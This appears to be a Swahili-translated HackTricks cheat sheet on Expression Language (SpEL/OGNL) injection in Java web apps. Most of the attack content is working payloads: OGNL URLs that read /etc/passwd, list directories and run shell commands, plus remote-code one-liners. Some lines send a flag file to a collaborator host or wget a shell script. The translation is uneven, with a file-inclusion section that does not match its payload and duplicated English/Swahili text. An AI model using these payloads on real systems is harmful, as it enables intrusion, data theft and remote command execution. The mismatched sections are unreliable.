hacktricks/pentesting-web/ssti-server-side-template-injection/el-expression-language.md

# EL - Lugha ya Ufafanuzi

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Taarifa Msingi

Lugha ya Ufafanuzi (EL) ni sehemu muhimu katika JavaEE kwa kuunganisha safu ya uwasilishaji (k.m., kurasa za wavuti) na mantiki ya programu (k.m., mabano yaliyosimamiwa), kuruhusu mwingiliano wao. Inatumika sana katika:

- **JavaServer Faces (JSF)**: Kwa kufunga vipengele vya UI kwa data/tendo la nyuma.
- **JavaServer Pages (JSP)**: Kwa kupata na kubadilisha data ndani ya kurasa za JSP.
- **Contexts and Dependency Injection for Java EE (CDI)**: Kwa kurahisisha mwingiliano wa safu ya wavuti na mabano yaliyosimamiwa.

**Muktadha wa Matumizi**:

- **Spring Framework**: Inatumika katika moduli mbalimbali kama Usalama na Data.
- **Matumizi ya Kawaida**: Kupitia SpEL API na watengenezaji katika lugha zinazotegemea JVM kama Java, Kotlin, na Scala.

EL iko katika teknolojia za JavaEE, mazingira ya kujitegemea, na inatambulika kupitia nyongeza za faili za `.jsp` au `.jsf`, makosa ya safu, na maneno kama "Servlet" kwenye vichwa. Walakini, vipengele vyake na matumizi ya herufi fulani vinaweza kutegemea toleo.

{% hint style="info" %}
Kulingana na **toleo la EL**, baadhi ya **vipengele** vinaweza kuwa **Hali ya Kuwasha** au **Hali ya Kuzima** na kawaida baadhi ya **herufi** zinaweza kuwa **zimezuiwa**.
{% endhint %}

## Mfano Msingi

(Unaweza kupata mafunzo mengine ya kuvutia kuhusu EL katika [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))

Pakua kutoka kwenye hazina ya [**Maven**](https://mvnrepository.com) faili za jar:

* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
* `commons-logging-1.2.jar`
* `spring-expression-5.2.1.RELEASE.jar`

Na uunde faili ya `Main.java` ifuatayo:
```java
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;

public class Main {
public static ExpressionParser PARSER;

public static void main(String[] args) throws Exception {
PARSER = new SpelExpressionParser();

System.out.println("Enter a String to evaluate:");
java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
String input = stdin.readLine();
Expression exp = PARSER.parseExpression(input);
String result = exp.getValue().toString();
System.out.println(result);
}
}
```
Kisha kamilisha kodi (ikiwa huna `javac` imewekwa, weka `sudo apt install default-jdk`):
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
Chukua programu na:
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]
```
Tafadhali angalia jinsi katika mfano uliopita neno `{5*5}` lilivyokuwa **limehakikiwa**.

## **Mafunzo Yaliyojengwa Kulingana na CVE**

Angalia katika **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**

## Payloads

### Hatua za Msingi
```bash
#Basic string operations examples
{"a".toString()}
[a]

{"dfd".replace("d","x")}
[xfx]

#Access to the String class
{"".getClass()}
[class java.lang.String]

#Access ro the String class bypassing "getClass"
#{""["class"]}

#Access to arbitrary class
{"".getClass().forName("java.util.Date")}
[class java.util.Date]

#List methods of a class
{"".getClass().forName("java.util.Date").getMethods()[0].toString()}
[public boolean java.util.Date.equals(java.lang.Object)]
```
### Uchunguzi

* Uchunguzi wa Burp
```bash
gk6q${"zkz".toString().replace("k", "x")}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
```
* Uchunguzi wa J2EE
```bash
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
```
* Lala kwa sekunde 10
```bash
#Blind detection vector (sleep during 10 seconds)
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
```
### Kuingiza Faili Kijijini

Remote File Inclusion (RFI) ni mbinu ya kuingiza faili kutoka kwenye seva ya mbali katika tovuti ya lengo. Mbinu hii inatumika mara nyingi katika mazingira ambapo tovuti inaruhusu kuingiza faili kutoka kwa seva nyingine bila kufanya ukaguzi wa kutosha.

Kwa kawaida, mbinu hii inaweza kutumika kwa kuingiza faili za script ambazo zinaweza kutekelezwa kwenye seva ya lengo. Hii inaweza kusababisha matokeo mbaya kama vile kutekelezwa kwa msimbo mbaya, ufikiaji usioidhinishwa kwa data nyeti, au hata kuchukua udhibiti kamili wa seva.

Mara nyingi, RFI inaweza kufanyika kwa kutumia vigezo vya URL ambavyo havijasafishwa vizuri. Kwa mfano, ikiwa tovuti inaruhusu kuingiza faili kutoka kwa seva nyingine kupitia vigezo vya URL, mshambuliaji anaweza kuingiza URL ya faili ya script ambayo itatekelezwa kwenye seva ya lengo.

Kwa kuzuia RFI, ni muhimu kuhakikisha kuwa vigezo vya URL vinachujwa vizuri na kuhakikisha kuwa tovuti inafanya ukaguzi wa kutosha kabla ya kuingiza faili kutoka kwa seva nyingine. Pia, ni muhimu kudumisha toleo la hivi karibuni la programu na kufanya ukaguzi wa mara kwa mara wa usalama ili kugundua na kurekebisha mapungufu yoyote ambayo yanaweza kusababisha RFI.
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
```
### Orodha ya Direktori

When conducting a web application penetration test, it is common to come across a directory listing vulnerability. This vulnerability occurs when the web server is configured to display the contents of a directory when no index file is present. This can expose sensitive information such as file names, directory structure, and even source code.

Wakati wa kufanya jaribio la uingizaji wa programu ya wavuti, ni kawaida kukutana na udhaifu wa orodha ya direktori. Udhaifu huu unatokea wakati seva ya wavuti imeundwa kuonyesha maudhui ya saraka wakati hakuna faili ya index inayopatikana. Hii inaweza kufichua habari nyeti kama majina ya faili, muundo wa saraka, na hata nambari ya chanzo.

To identify if a directory listing vulnerability exists, you can manually navigate to the directory in question and check if the contents are displayed. Alternatively, you can use automated tools like dirb or dirbuster to scan the target website for directories with listing enabled.

Ili kubaini ikiwa kuna udhaifu wa orodha ya direktori, unaweza kwa mkono kufikia saraka husika na kuangalia ikiwa maudhui yanaonyeshwa. Vinginevyo, unaweza kutumia zana za otomatiki kama dirb au dirbuster kutafuta wavuti ya lengo kwa saraka zilizo na orodha iliyoruhusiwa.

If a directory listing vulnerability is found, it is important to report it to the website owner or administrator so that appropriate measures can be taken to secure the server.

Ikiwa udhaifu wa orodha ya direktori unapatikana, ni muhimu kuripoti kwa mmiliki wa wavuti au msimamizi ili hatua sahihi ziweze kuchukuliwa ili kuhakikisha usalama wa seva.
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
```
### RCE

* Maelezo ya msingi ya RCE
```bash
#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
[public static java.lang.Runtime java.lang.Runtime.getRuntime()]

#Execute command (you won't see the command output in the console)
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
[Process[pid=10892, exitValue=0]]

#Execute command bypassing "getClass"
#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}

# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
* RCE **linux**
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* RCE **Windows** (haijajaribiwa)
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* **Zaidi ya RCE**
```java
// Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()

// Method using Runtime via getDeclaredConstructors
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
#{session.getAttribute("rtc").setAccessible(true)}
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}

// Method using processbuilder
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")}
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.getAttribute("a")}

// Method using Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}

// Method using ScriptEngineManager one-liner
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}

// Method using ScriptEngineManager
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");

//https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt
(T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("cmd "+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+"c "+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(100)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(114)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()))
T(java.lang.System).getenv()[0]
T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
```
### Ukaguzi wa mazingira

* `applicationScope` - mazingira ya kipekee ya programu
* `requestScope` - mazingira ya ombi
* `initParam` - mazingira ya kuanzisha programu
* `sessionScope` - mazingira ya kikao
* `param.X` - thamani ya param ambapo X ni jina la parameter ya http

Utahitaji kubadilisha aina ya mazingira haya kuwa String kama:
```bash
${sessionScope.toString()}
```
#### Mfano wa Kupita kwa Uthibitishaji

```java
${7*7}
```

This is a simple example of an expression that can be injected into a server-side template. In this case, the expression `${7*7}` will be evaluated by the server and the result, `49`, will be rendered in the output.

Hii ni mfano rahisi wa kielelezo kinachoweza kuingizwa kwenye kigeuzi cha upande wa seva. Katika kesi hii, kielelezo `${7*7}` kitahesabiwa na seva na matokeo, `49`, yataonyeshwa kwenye matokeo.
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
Programu inaweza pia kutumia variables maalum kama:
```bash
${user}
${password}
${employee.FirstName}
```
## Kupitisha WAF

Angalia [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)

## Marejeo

* [https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/](https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/)
* [https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>